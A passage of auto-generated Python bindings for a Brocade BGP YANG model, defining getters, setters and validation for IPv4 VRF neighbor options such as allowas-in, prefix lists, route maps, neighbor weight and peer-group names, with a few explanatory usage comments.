return self.__allowas_in
def _set_allowas_in(self, v, load=False):
"""
Setter method for allowas_in, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/allowas_in (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_allowas_in is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_allowas_in() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..10']}), is_leaf=True, yang_name="allowas-in", rest_name="allowas-in", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Disables the AS_PATH check of the routes learned from the AS', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='uint32', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """allowas_in must be of a type compatible with uint32""",
'defined-type': "uint32",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..10']}), is_leaf=True, yang_name="allowas-in", rest_name="allowas-in", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Disables the AS_PATH check of the routes learned from the AS', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='uint32', is_config=True)""",
})
self.__allowas_in = t
if hasattr(self, '_set'):
self._set()
def _unset_allowas_in(self):
self.__allowas_in = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'1..10']}), is_leaf=True, yang_name="allowas-in", rest_name="allowas-in", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Disables the AS_PATH check of the routes learned from the AS', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='uint32', is_config=True)
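  # allowas-in is a uint32 narrowed to the range 1..10 -- effectively how many
  # occurrences of the local AS are tolerated in received AS_PATHs (standard
  # allowas-in semantics; the range itself comes from the restriction above).
  # Sketch, reusing the hypothetical `nbr` instance:
  #
  #     nbr._set_allowas_in(3)    # accepted
  #     nbr._set_allowas_in(20)   # rejected: raises ValueError, value outside 1..10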
def _get_filter_list(self):
"""
Getter method for filter_list, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/filter_list (container)
"""
return self.__filter_list
def _set_filter_list(self, v, load=False):
"""
Setter method for filter_list, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/filter_list (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_filter_list is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_filter_list() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=filter_list.filter_list, is_container='container', presence=False, yang_name="filter-list", rest_name="filter-list", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Establish BGP filters', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """filter_list must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=filter_list.filter_list, is_container='container', presence=False, yang_name="filter-list", rest_name="filter-list", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Establish BGP filters', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__filter_list = t
if hasattr(self, '_set'):
self._set()
def _unset_filter_list(self):
self.__filter_list = YANGDynClass(base=filter_list.filter_list, is_container='container', presence=False, yang_name="filter-list", rest_name="filter-list", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Establish BGP filters', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_maximum_prefix(self):
"""
Getter method for maximum_prefix, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/maximum_prefix (container)
"""
return self.__maximum_prefix
def _set_maximum_prefix(self, v, load=False):
"""
Setter method for maximum_prefix, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/maximum_prefix (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_maximum_prefix is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_maximum_prefix() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=maximum_prefix.maximum_prefix, is_container='container', presence=False, yang_name="maximum-prefix", rest_name="maximum-prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Maximum number of prefix accept from this peer', u'cli-incomplete-no': None, u'cli-break-sequence-commands': None, u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """maximum_prefix must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=maximum_prefix.maximum_prefix, is_container='container', presence=False, yang_name="maximum-prefix", rest_name="maximum-prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Maximum number of prefix accept from this peer', u'cli-incomplete-no': None, u'cli-break-sequence-commands': None, u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__maximum_prefix = t
if hasattr(self, '_set'):
self._set()
def _unset_maximum_prefix(self):
self.__maximum_prefix = YANGDynClass(base=maximum_prefix.maximum_prefix, is_container='container', presence=False, yang_name="maximum-prefix", rest_name="maximum-prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Maximum number of prefix accept from this peer', u'cli-incomplete-no': None, u'cli-break-sequence-commands': None, u'cli-compact-syntax': None, u'cli-sequence-commands': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
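  # Container-typed children such as filter-list, maximum-prefix and the others
  # below are normally not assigned wholesale; their nested leaves are set on the
  # child object returned by the getter, e.g. nbr.maximum_prefix.<leaf> = <value>
  # (the concrete leaf names live in the imported maximum_prefix class, not here).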
def _get_default_originate(self):
"""
Getter method for default_originate, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/default_originate (container)
"""
return self.__default_originate
def _set_default_originate(self, v, load=False):
"""
Setter method for default_originate, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/default_originate (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_default_originate is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_default_originate() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=default_originate.default_originate, is_container='container', presence=False, yang_name="default-originate", rest_name="default-originate", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'info': u'Originate default route to peer', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """default_originate must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=default_originate.default_originate, is_container='container', presence=False, yang_name="default-originate", rest_name="default-originate", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'info': u'Originate default route to peer', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__default_originate = t
if hasattr(self, '_set'):
self._set()
def _unset_default_originate(self):
self.__default_originate = YANGDynClass(base=default_originate.default_originate, is_container='container', presence=False, yang_name="default-originate", rest_name="default-originate", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-compact-syntax': None, u'info': u'Originate default route to peer', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_prefix_list(self):
"""
Getter method for prefix_list, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/prefix_list (container)
YANG Description: either prefix list or distribution-list
"""
return self.__prefix_list
def _set_prefix_list(self, v, load=False):
"""
Setter method for prefix_list, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/prefix_list (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_prefix_list is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_prefix_list() directly.
YANG Description: either prefix list or distribution-list
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=prefix_list.prefix_list, is_container='container', presence=False, yang_name="prefix-list", rest_name="prefix-list", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Prefix List for filtering routes', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """prefix_list must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=prefix_list.prefix_list, is_container='container', presence=False, yang_name="prefix-list", rest_name="prefix-list", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Prefix List for filtering routes', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__prefix_list = t
if hasattr(self, '_set'):
self._set()
def _unset_prefix_list(self):
self.__prefix_list = YANGDynClass(base=prefix_list.prefix_list, is_container='container', presence=False, yang_name="prefix-list", rest_name="prefix-list", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Prefix List for filtering routes', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_neighbor_route_map(self):
"""
Getter method for neighbor_route_map, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/neighbor_route_map (container)
"""
return self.__neighbor_route_map
def _set_neighbor_route_map(self, v, load=False):
"""
Setter method for neighbor_route_map, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/neighbor_route_map (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_neighbor_route_map is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_neighbor_route_map() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=neighbor_route_map.neighbor_route_map, is_container='container', presence=False, yang_name="neighbor-route-map", rest_name="route-map", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply route map to neighbor', u'alt-name': u'route-map', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """neighbor_route_map must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=neighbor_route_map.neighbor_route_map, is_container='container', presence=False, yang_name="neighbor-route-map", rest_name="route-map", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply route map to neighbor', u'alt-name': u'route-map', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__neighbor_route_map = t
if hasattr(self, '_set'):
self._set()
def _unset_neighbor_route_map(self):
self.__neighbor_route_map = YANGDynClass(base=neighbor_route_map.neighbor_route_map, is_container='container', presence=False, yang_name="neighbor-route-map", rest_name="route-map", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply route map to neighbor', u'alt-name': u'route-map', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_route_reflector_client(self):
"""
Getter method for route_reflector_client, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/route_reflector_client (empty)
"""
return self.__route_reflector_client
def _set_route_reflector_client(self, v, load=False):
"""
Setter method for route_reflector_client, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/route_reflector_client (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_route_reflector_client is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_route_reflector_client() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="route-reflector-client", rest_name="route-reflector-client", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure a neighbor as Route Reflector client', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """route_reflector_client must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="route-reflector-client", rest_name="route-reflector-client", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure a neighbor as Route Reflector client', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)""",
})
self.__route_reflector_client = t
if hasattr(self, '_set'):
self._set()
def _unset_route_reflector_client(self):
self.__route_reflector_client = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="route-reflector-client", rest_name="route-reflector-client", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure a neighbor as Route Reflector client', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
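  # 'empty' leaves such as route-reflector-client are modelled with YANGBool;
  # assigning True marks the leaf as present in the configuration (hypothetical
  # `nbr` instance as above):
  #
  #     nbr._set_route_reflector_client(True)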
def _get_unsuppress_map(self):
"""
Getter method for unsuppress_map, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/unsuppress_map (container)
"""
return self.__unsuppress_map
def _set_unsuppress_map(self, v, load=False):
"""
Setter method for unsuppress_map, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/unsuppress_map (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_unsuppress_map is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_unsuppress_map() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=unsuppress_map.unsuppress_map, is_container='container', presence=False, yang_name="unsuppress-map", rest_name="unsuppress-map", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Route-map to selectively unsuppress suppressed routes', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """unsuppress_map must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=unsuppress_map.unsuppress_map, is_container='container', presence=False, yang_name="unsuppress-map", rest_name="unsuppress-map", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Route-map to selectively unsuppress suppressed routes', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__unsuppress_map = t
if hasattr(self, '_set'):
self._set()
def _unset_unsuppress_map(self):
self.__unsuppress_map = YANGDynClass(base=unsuppress_map.unsuppress_map, is_container='container', presence=False, yang_name="unsuppress-map", rest_name="unsuppress-map", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Route-map to selectively unsuppress suppressed routes', u'cli-incomplete-no': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_af_nei_weight(self):
"""
Getter method for af_nei_weight, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/af_nei_weight (nei-weight)
"""
return self.__af_nei_weight
def _set_af_nei_weight(self, v, load=False):
"""
Setter method for af_nei_weight, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/af_nei_weight (nei-weight)
If this variable is read-only (config: false) in the
source YANG file, then _set_af_nei_weight is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_af_nei_weight() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..65535']}), is_leaf=True, yang_name="af-nei-weight", rest_name="weight", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set default weight for routes from this neighbor', u'cli-full-command': None, u'alt-name': u'weight'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='nei-weight', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """af_nei_weight must be of a type compatible with nei-weight""",
'defined-type': "brocade-bgp:nei-weight",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..65535']}), is_leaf=True, yang_name="af-nei-weight", rest_name="weight", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set default weight for routes from this neighbor', u'cli-full-command': None, u'alt-name': u'weight'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='nei-weight', is_config=True)""",
})
self.__af_nei_weight = t
if hasattr(self, '_set'):
self._set()
def _unset_af_nei_weight(self):
self.__af_nei_weight = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0..65535']}), is_leaf=True, yang_name="af-nei-weight", rest_name="weight", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Set default weight for routes from this neighbor', u'cli-full-command': None, u'alt-name': u'weight'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='nei-weight', is_config=True)
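  # The neighbor weight leaf is a uint32 narrowed to 0..65535; note the rest_name
  # is 'weight', so the REST/CLI keyword differs from the YANG leaf name.
  #
  #     nbr._set_af_nei_weight(100)   # any value in 0..65535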
def _get_enable_peer_as_check(self):
"""
Getter method for enable_peer_as_check, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/enable_peer_as_check (empty)
"""
return self.__enable_peer_as_check
def _set_enable_peer_as_check(self, v, load=False):
"""
Setter method for enable_peer_as_check, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/enable_peer_as_check (empty)
If this variable is read-only (config: false) in the
source YANG file, then _set_enable_peer_as_check is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_enable_peer_as_check() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGBool, is_leaf=True, yang_name="enable-peer-as-check", rest_name="enable-peer-as-check", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Disable routes advertise between peers in same AS', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """enable_peer_as_check must be of a type compatible with empty""",
'defined-type': "empty",
'generated-type': """YANGDynClass(base=YANGBool, is_leaf=True, yang_name="enable-peer-as-check", rest_name="enable-peer-as-check", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Disable routes advertise between peers in same AS', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)""",
})
self.__enable_peer_as_check = t
if hasattr(self, '_set'):
self._set()
def _unset_enable_peer_as_check(self):
self.__enable_peer_as_check = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="enable-peer-as-check", rest_name="enable-peer-as-check", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Disable routes advertise between peers in same AS', u'cli-full-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='empty', is_config=True)
def _get_additional_paths(self):
"""
Getter method for additional_paths, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/additional_paths (container)
"""
return self.__additional_paths
def _set_additional_paths(self, v, load=False):
"""
Setter method for additional_paths, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/additional_paths (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_additional_paths is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_additional_paths() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=additional_paths.additional_paths, is_container='container', presence=False, yang_name="additional-paths", rest_name="additional-paths", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Specify bgp additional paths', u'hidden': u'full', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """additional_paths must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=additional_paths.additional_paths, is_container='container', presence=False, yang_name="additional-paths", rest_name="additional-paths", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Specify bgp additional paths', u'hidden': u'full', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)""",
})
self.__additional_paths = t
if hasattr(self, '_set'):
self._set()
def _unset_additional_paths(self):
self.__additional_paths = YANGDynClass(base=additional_paths.additional_paths, is_container='container', presence=False, yang_name="additional-paths", rest_name="additional-paths", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Specify bgp additional paths', u'hidden': u'full', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='container', is_config=True)
def _get_associate_peer_group(self):
"""
Getter method for associate_peer_group, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/associate_peer_group (bgp-peergroup)
"""
return self.__associate_peer_group
def _set_associate_peer_group(self, v, load=False):
"""
Setter method for associate_peer_group, mapped from YANG variable /routing_system/router/router_bgp/address_family/ipv4/ipv4_unicast/af_vrf/neighbor/af_ipv4_vrf_neighbor_address_holder/af_ipv4_neighbor_addr/associate_peer_group (bgp-peergroup)
If this variable is read-only (config: false) in the
source YANG file, then _set_associate_peer_group is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_associate_peer_group() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9\\\\\\\\@#\\+\\*\\(\\)=\\{~\\}%<>=$_\\[\\]\\|]{0,62})'}), is_leaf=True, yang_name="associate-peer-group", rest_name="peer-group", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Assign peer-group to neighbor', u'alt-name': u'peer-group'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='bgp-peergroup', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """associate_peer_group must be of a type compatible with bgp-peergroup""",
'defined-type': "brocade-bgp:bgp-peergroup",
'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9\\\\\\\\@#\\+\\*\\(\\)=\\{~\\}%<>=$_\\[\\]\\|]{0,62})'}), is_leaf=True, yang_name="associate-peer-group", rest_name="peer-group", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Assign peer-group to neighbor', u'alt-name': u'peer-group'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='bgp-peergroup', is_config=True)""",
})
self.__associate_peer_group = t
if hasattr(self, '_set'):
self._set()
def _unset_associate_peer_group(self):
self.__associate_peer_group = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9\\\\\\\\@#\\+\\*\\(\\)=\\{~\\}%<>=$_\\[\\]\\|]{0,62})'}), is_leaf=True, yang_name="associate-peer-group", rest_name="peer-group", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Assign peer-group to neighbor', u'alt-name': u'peer-group'}}, namespace='urn:brocade.com:mgmt:brocade-bgp', defining_module='brocade-bgp', yang_type='bgp-peergroup', is_config=True)
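  # Peer-group names must start with a letter and may run to 63 characters in
  # total (one leading letter plus up to 62 characters from the allowed set in
  # the pattern above). Illustrative only; the group name is hypothetical:
  #
  #     nbr._set_associate_peer_group('SPINE-PEERS')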
def _get_description(self):
"""
